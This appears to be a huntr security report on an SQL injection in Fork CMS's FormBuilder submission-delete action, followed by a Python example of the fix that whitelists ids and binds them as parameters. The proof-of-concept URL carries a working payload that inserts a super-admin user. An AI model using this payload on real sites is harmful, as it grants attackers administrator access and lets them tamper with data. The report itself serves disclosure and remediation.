
huntr report by kstarkloff, id 841503DD-311C-470A-A8EC-D4579B3274EB
History: Oct 30, 2021 - 10:52 p.m.

SQL Injection in forkcms/forkcms

2021-10-30 22:52:59
kstarkloff
www.huntr.dev
16
Tags: sql injection, forkcms, formbuilder, url, database manipulation, security vulnerability

EPSS: 0.001 (percentile 30.3%)

Description

When deleting submissions that belong to a form (made with the FormBuilder module), the parameter id[] is vulnerable to SQL injection.

Proof of Concept

  • Call the URL
http://127.0.0.1/private/en/form_builder/mass_data_action?form_id=2&token=aettnn67s&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%[email protected]%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=delete
  • To test this URL successfully, you need a valid form and some submissions to that form. You might have to adjust the parameter form_id to another value.
  • After calling this URL, you have a new entry in users table.

Impact

An attacker can tamper with data in the database at will.
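How a mass delete action of this kind can be hardened, as an added example that is not Fork CMS code: every id[] value is whitelisted as a decimal integer and then bound as a query parameter, so a value like `3);insert ...` is rejected before any SQL is built. The table and column names (forms_data, users) and the in-memory SQLite setup are assumptions made for this illustration.

```python
import re
import sqlite3

# Constructed, self-contained stand-in for the mass delete action (not Fork CMS code).
# Table and column names are assumptions for this example.
SCHEMA = """
CREATE TABLE forms_data (id INTEGER PRIMARY KEY, form_id INTEGER NOT NULL);
CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT, is_god INTEGER);
INSERT INTO forms_data (id, form_id) VALUES (1, 2), (3, 2), (5, 2), (7, 9);
INSERT INTO users (email, password, is_god) VALUES ('admin@example.invalid', 'x', 1);
"""

ID_RE = re.compile(r"[0-9]{1,18}")  # plain decimal ids only, nothing else


def parse_submission_ids(raw_ids):
    """Whitelist each id[] value as a decimal integer; reject anything else outright.

    A value such as '3);insert into users ...' fails the pattern and never reaches SQL.
    """
    ids = []
    for raw in raw_ids:
        value = str(raw).strip()
        if not ID_RE.fullmatch(value):
            raise ValueError(f"invalid submission id: {raw!r}")
        ids.append(int(value))
    return ids


def delete_submissions(conn, form_id, raw_ids):
    """Delete the given submissions of one form using bound parameters only.

    The only thing derived from user input in the SQL text is the number of
    placeholders; every id is passed as a parameter, so no value can alter the query.
    """
    ids = parse_submission_ids(raw_ids)
    if not ids:
        return 0
    placeholders = ", ".join("?" for _ in ids)
    cur = conn.execute(
        f"DELETE FROM forms_data WHERE form_id = ? AND id IN ({placeholders})",
        (int(form_id), *ids),
    )
    conn.commit()
    return cur.rowcount


def open_sample_db():
    """In-memory SQLite database seeded with the constructed sample rows above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn
```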

